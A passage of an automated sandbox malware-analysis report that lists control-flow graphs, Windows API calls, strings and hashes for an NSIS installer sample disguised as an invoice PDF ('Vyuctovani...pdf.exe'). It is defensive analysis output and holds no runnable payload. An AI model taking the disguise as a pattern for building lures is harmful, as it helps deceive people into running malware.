                          • API String ID: 2035342205-2601149252
                          • Opcode ID: e65c1afb5ce04bfff1b9dd792645133c2580891d9bff7bb92b93a5cef5ee754a
                          • Instruction ID: 1160c0d77fe4d13f1128eb1d577554063cb727c3bd77b197dbc427f3935a6ad6
                          • Opcode Fuzzy Hash: e65c1afb5ce04bfff1b9dd792645133c2580891d9bff7bb92b93a5cef5ee754a
                          • Instruction Fuzzy Hash: 4341D231900A14F6CB21AB618C89ABF7678DF45728F14823BF811751D1DB7C4A819F6E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 606 406404-406418 FindFirstFileW 607 406425 606->607 608 40641a-406423 FindClose 606->608 609 406427-406428 607->609 608->609
                          APIs
                          • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,00405BC6,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 0040640F
                          • FindClose.KERNELBASE(00000000), ref: 0040641B
                          Strings
                          • pOz, xrefs: 00406405
                          • C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp, xrefs: 00406404
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\Users\user~1\AppData\Local\Temp\nsq1073.tmp$pOz
                          • API String ID: 2295610775-1314408282
                          • Opcode ID: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
                          • Instruction ID: 1a5cf689ee624dc4a49ee510f31fc256c936ed076e10f29bc7cab2e009227d9e
                          • Opcode Fuzzy Hash: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
                          • Instruction Fuzzy Hash: 66D012715081209FC3001B786D0C85B7E58AF4A3307758F36F466F12E4D7788C62869C

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 133 403cad-403cbf 134 403e00-403e0f 133->134 135 403cc5-403ccb 133->135 137 403e11-403e59 GetDlgItem * 2 call 404185 SetClassLongW call 40140b 134->137 138 403e5e-403e73 134->138 135->134 136 403cd1-403cda 135->136 141 403cdc-403ce9 SetWindowPos 136->141 142 403cef-403cf2 136->142 137->138 139 403eb3-403eb8 call 4041d1 138->139 140 403e75-403e78 138->140 152 403ebd-403ed8 139->152 144 403e7a-403e85 call 401389 140->144 145 403eab-403ead 140->145 141->142 147 403cf4-403d06 ShowWindow 142->147 148 403d0c-403d12 142->148 144->145 166 403e87-403ea6 SendMessageW 144->166 145->139 151 404152 145->151 147->148 153 403d14-403d29 DestroyWindow 148->153 154 403d2e-403d31 148->154 163 404154-40415b 151->163 161 403ee1-403ee7 152->161 162 403eda-403edc call 40140b 152->162 156 40412f-404135 153->156 158 403d33-403d3f SetWindowLongW 154->158 159 403d44-403d4a 154->159 156->151 167 404137-40413d 156->167 158->163 164 403d50-403d61 GetDlgItem 159->164 165 403ded-403dfb call 4041ec 159->165 169 404110-404129 DestroyWindow EndDialog 161->169 170 403eed-403ef8 161->170 162->161 171 403d80-403d83 164->171 172 403d63-403d7a SendMessageW IsWindowEnabled 164->172 165->163 166->163 167->151 174 40413f-404148 ShowWindow 167->174 169->156 170->169 175 403efe-403f4b call 4060e3 call 404185 * 3 GetDlgItem 170->175 177 403d85-403d86 171->177 178 403d88-403d8b 171->178 172->151 172->171 174->151 203 403f55-403f91 ShowWindow KiUserCallbackDispatcher call 4041a7 EnableWindow 175->203 204 403f4d-403f52 175->204 181 403db6-403dbb call 40415e 177->181 182 403d99-403d9e 178->182 183 403d8d-403d93 178->183 181->165 186 403dd4-403de7 SendMessageW 182->186 188 403da0-403da6 182->188 183->186 187 403d95-403d97 183->187 186->165 187->181 191 403da8-403dae call 40140b 188->191 192 403dbd-403dc6 call 40140b 188->192 201 403db4 191->201 192->165 200 403dc8-403dd2 192->200 200->201 201->181 207 403f93-403f94 203->207 208 403f96 203->208 204->203 209 403f98-403fc6 GetSystemMenu EnableMenuItem SendMessageW 207->209 208->209 210 403fc8-403fd9 SendMessageW 209->210 211 403fdb 209->211 212 403fe1-40401f call 4041ba call 4060c1 lstrlenW call 4060e3 SetWindowTextW call 401389 210->212 211->212 212->152 221 404025-404027 212->221 221->152 222 40402d-404031 221->222 223 404050-404064 DestroyWindow 222->223 224 404033-404039 222->224 223->156 225 40406a-404097 CreateDialogParamW 223->225 224->151 226 40403f-404045 224->226 225->156 227 40409d-4040f4 call 404185 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->152 228 40404b 226->228 227->151 233 4040f6-404109 ShowWindow call 4041d1 227->233 228->151 235 40410e 233->235 235->156
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE9
                          • ShowWindow.USER32(?), ref: 00403D06
                          • DestroyWindow.USER32 ref: 00403D1A
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D36
                          • GetDlgItem.USER32(?,?), ref: 00403D57
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D6B
                          • IsWindowEnabled.USER32(00000000), ref: 00403D72
                          • GetDlgItem.USER32(?,00000001), ref: 00403E20
                          • GetDlgItem.USER32(?,00000002), ref: 00403E2A
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E44
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E95
                          • GetDlgItem.USER32(?,00000003), ref: 00403F3B
                          • ShowWindow.USER32(00000000,?), ref: 00403F5C
                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F6E
                          • EnableWindow.USER32(?,?), ref: 00403F89
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F9F
                          • EnableMenuItem.USER32(00000000), ref: 00403FA6
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FBE
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FD1
                          • lstrlenW.KERNEL32(007A1F20,?,007A1F20,007A7A20), ref: 00403FFA
                          • SetWindowTextW.USER32(?,007A1F20), ref: 0040400E
                          • ShowWindow.USER32(?,0000000A), ref: 00404142
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                          • String ID:
                          • API String ID: 3282139019-0
                          • Opcode ID: aafb21cce241bd3422346a601cfa9bdf3d9b5db9db0e3f237e977f240631d110
                          • Instruction ID: 2fdfadb1b5313d8de23c737a6981c36fc239097adb6e13b2960366b833a5549f
                          • Opcode Fuzzy Hash: aafb21cce241bd3422346a601cfa9bdf3d9b5db9db0e3f237e977f240631d110
                          • Instruction Fuzzy Hash: 82C1CEB2504204EFDB206F21ED89E2B3A69EB96705F00853EF651B51F0CB3D9891DB1E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 236 40390a-403922 call 40649b 239 403924-403934 call 406008 236->239 240 403936-40396d call 405f8e 236->240 249 403990-4039b9 call 403be0 call 405b7d 239->249 245 403985-40398b lstrcatW 240->245 246 40396f-403980 call 405f8e 240->246 245->249 246->245 254 403a4b-403a53 call 405b7d 249->254 255 4039bf-4039c4 249->255 261 403a61-403a86 LoadImageW 254->261 262 403a55-403a5c call 4060e3 254->262 255->254 256 4039ca-4039f2 call 405f8e 255->256 256->254 263 4039f4-4039f8 256->263 265 403b07-403b0f call 40140b 261->265 266 403a88-403ab8 RegisterClassW 261->266 262->261 267 403a0a-403a16 lstrlenW 263->267 268 4039fa-403a07 call 405aa2 263->268 280 403b11-403b14 265->280 281 403b19-403b24 call 403be0 265->281 269 403bd6 266->269 270 403abe-403b02 SystemParametersInfoW CreateWindowExW 266->270 274 403a18-403a26 lstrcmpiW 267->274 275 403a3e-403a46 call 405a75 call 4060c1 267->275 268->267 273 403bd8-403bdf 269->273 270->265 274->275 279 403a28-403a32 GetFileAttributesW 274->279 275->254 284 403a34-403a36 279->284 285 403a38-403a39 call 405ac1 279->285 280->273 289 403b2a-403b44 ShowWindow call 40642b 281->289 290 403bad-403bb5 call 4052f3 281->290 284->275 284->285 285->275 297 403b50-403b62 GetClassInfoW 289->297 298 403b46-403b4b call 40642b 289->298 295 403bb7-403bbd 290->295 296 403bcf-403bd1 call 40140b 290->296 295->280 299 403bc3-403bca call 40140b 295->299 296->269 302 403b64-403b74 GetClassInfoW RegisterClassW 297->302 303 403b7a-403b9d DialogBoxParamW call 40140b 297->303 298->297 299->280 302->303 307 403ba2-403bab call 40385a 303->307 307->273
                          APIs
                            • Part of subcall function 0040649B: GetModuleHandleA.KERNEL32(?,00000020,?,0040337A,00000009), ref: 004064AD
                            • Part of subcall function 0040649B: GetProcAddress.KERNEL32(00000000,?), ref: 004064C8
                          • lstrcatW.KERNEL32(1033,007A1F20), ref: 0040398B
                          • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\twinsomeness,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,771B3420), ref: 00403A0B
                          • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\twinsomeness,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A1E
                          • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A29
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\twinsomeness), ref: 00403A72
                            • Part of subcall function 00406008: wsprintfW.USER32 ref: 00406015
                          • RegisterClassW.USER32(007A79C0), ref: 00403AAF
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403AC7
                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AFC
                          • ShowWindow.USER32(00000005,00000000), ref: 00403B32
                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403B5E
                          • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403B6B
                          • RegisterClassW.USER32(007A79C0), ref: 00403B74
                          • DialogBoxParamW.USER32(?,00000000,00403CAD,00000000), ref: 00403B93
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\twinsomeness$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                          • API String ID: 1975747703-1108589102
                          • Opcode ID: 1c91817c6d422e2bf7344803dbed09d3f1d01b7940f7d5e81b4c7eea282cc87f
                          • Instruction ID: 01d9be229e4668e71e20a61315ff8562772da1c974f0f981348189b6b31dac12
                          • Opcode Fuzzy Hash: 1c91817c6d422e2bf7344803dbed09d3f1d01b7940f7d5e81b4c7eea282cc87f
                          • Instruction Fuzzy Hash: D66182702406046ED620AF669D45F2B3A6CEBC5749F40853FF981B62E2DB7D6901CB2D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 310 402e82-402ed0 GetTickCount GetModuleFileNameW call 405c96 313 402ed2-402ed7 310->313 314 402edc-402f0a call 4060c1 call 405ac1 call 4060c1 GetFileSize 310->314 315 4030b4-4030b8 313->315 322 402f10 314->322 323 402ff7-403005 call 402e1e 314->323 324 402f15-402f2c 322->324 329 403007-40300a 323->329 330 40305a-40305f 323->330 326 402f30-402f39 call 4032b3 324->326 327 402f2e 324->327 336 403061-403069 call 402e1e 326->336 337 402f3f-402f46 326->337 327->326 332 40300c-403024 call 4032c9 call 4032b3 329->332 333 40302e-403058 GlobalAlloc call 4032c9 call 4030bb 329->333 330->315 332->330 356 403026-40302c 332->356 333->330 361 40306b-40307c 333->361 336->330 340 402fc2-402fc6 337->340 341 402f48-402f5c call 405c51 337->341 345 402fd0-402fd6 340->345 346 402fc8-402fcf call 402e1e 340->346 341->345 359 402f5e-402f65 341->359 352 402fe5-402fef 345->352 353 402fd8-402fe2 call 40654c 345->353 346->345 352->324 360 402ff5 352->360 353->352 356->330 356->333 359->345 365 402f67-402f6e 359->365 360->323 362 403084-403089 361->362 363 40307e 361->363 366 40308a-403090 362->366 363->362 365->345 367 402f70-402f77 365->367 366->366 368 403092-4030ad SetFilePointer call 405c51 366->368 367->345 369 402f79-402f80 367->369 372 4030b2 368->372 369->345 371 402f82-402fa2 369->371 371->330 373 402fa8-402fac 371->373 372->315 374 402fb4-402fbc 373->374 375 402fae-402fb2 373->375 374->345 376 402fbe-402fc0 374->376 375->360 375->374 376->345
                          APIs
                          • GetTickCount.KERNEL32 ref: 00402E93
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,00000400,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00402EAF
                            • Part of subcall function 00405C96: GetFileAttributesW.KERNELBASE(00000003,00402EC2,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405C9A
                            • Part of subcall function 00405C96: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405CBC
                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00402EFB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                          • API String ID: 4283519449-104016990
                          • Opcode ID: ce7be6ed6bcac94d604af5a0a8816d5a0cec0cca1bacb5e081b4aa9642dd9374
                          • Instruction ID: 48e7e34c2b017b792b8509286a2adfca438118cc3a200129a79ef70b2a7409b7
                          • Opcode Fuzzy Hash: ce7be6ed6bcac94d604af5a0a8816d5a0cec0cca1bacb5e081b4aa9642dd9374
                          • Instruction Fuzzy Hash: 4051E371901209ABDB109F65DE89B9E7BB8EB10355F14813FF900B22D1DB7C8E809B5D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 503 405220-405235 504 40523b-40524c 503->504 505 4052ec-4052f0 503->505 506 405257-405263 lstrlenW 504->506 507 40524e-405252 call 4060e3 504->507 509 405280-405284 506->509 510 405265-405275 lstrlenW 506->510 507->506 512 405293-405297 509->512 513 405286-40528d SetWindowTextW 509->513 510->505 511 405277-40527b lstrcatW 510->511 511->509 514 405299-4052db SendMessageW * 3 512->514 515 4052dd-4052df 512->515 513->512 514->515 515->505 516 4052e1-4052e4 515->516 516->505
                          APIs
                          • lstrlenW.KERNEL32(udvistes,00000000,00796DF3,771B23A0,?,?,?,?,?,?,?,?,?,004031FC,00000000,?), ref: 00405258
                          • lstrlenW.KERNEL32(004031FC,udvistes,00000000,00796DF3,771B23A0,?,?,?,?,?,?,?,?,?,004031FC,00000000), ref: 00405268
                          • lstrcatW.KERNEL32(udvistes,004031FC), ref: 0040527B
                          • SetWindowTextW.USER32(udvistes,udvistes), ref: 0040528D
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052B3
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052CD
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID: udvistes
                          • API String ID: 2531174081-1288086289
                          • Opcode ID: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                          • Instruction ID: 98799ecbbdae69ecf8805142924c7471705cc156238751a5c8a42c2ad73b3a7a
                          • Opcode Fuzzy Hash: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                          • Instruction Fuzzy Hash: 5B217C71900618BBCB119FA5DD85ADFBFB8EF85354F10807AF944B62A0C7794A50CFA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 517 4056ef-40573a CreateDirectoryW 518 405740-40574d GetLastError 517->518 519 40573c-40573e 517->519 520 405767-405769 518->520 521 40574f-405763 SetFileSecurityW 518->521 519->520 521->519 522 405765 GetLastError 521->522 522->520
                          APIs
                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405732
                          • GetLastError.KERNEL32 ref: 00405746
                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040575B
                          • GetLastError.KERNEL32 ref: 00405765
                          Strings
                          • C:\Users\user\Desktop, xrefs: 004056EF
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405715
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                          • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                          • API String ID: 3449924974-2752704311
                          • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                          • Instruction ID: 6c42f7b7b9652fd6c04dce52b4264f7fa901b92340194c0b39f9bda142b0fdef
                          • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
